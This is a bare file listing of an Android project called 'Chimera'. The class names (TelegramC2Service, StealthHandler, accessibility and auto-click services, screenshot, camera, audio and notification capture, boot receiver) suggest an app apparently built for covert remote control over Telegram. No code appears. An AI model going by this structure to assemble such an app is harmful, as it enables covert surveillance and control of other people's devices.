# Chimera

.github/workflows/: android.yml
app/: build.gradle  google-services.json
app/src/main/: AndroidManifest.xml
app/src/main/assets/: tg_config.json
app/src/main/java/com/chimera/: AudioHandler.java  AudioPlaybackService.java  AutoClickerAccessibilityService.java  BootReceiver.java  CameraActivity.java  CameraHandler.java  ChimeraAccessibilityService.java  ChimeraApplication.java  CommandReceiver.java  ConfigLoader.java  CoreService.java  CrashHandler.java  DeviceControlHandler.java  DeviceDetailsHelper.java  DirectoryPickerActivity.java  ErrorLogger.java  FCMHandlerService.java  FCMService.java  FileManager.java  MainActivity.java  NotificationListener.java  OverlayActivity.java  OverlayService.java  ProvisioningActivity.java  ProxyActivity.java  ScreenshotActivity.java  ScreenshotService.java  StealthHandler.java  TelegramBotWorker.java  TelegramC2Service.java  WakeActivity.java
app/src/main/res/layout/: activity_main.xml  activity_provisioning.xml
app/src/main/res/values/: strings.xml  styles.xml  themes.xml
app/src/main/res/xml/: accessibility_service_config.xml  provider_paths.xml
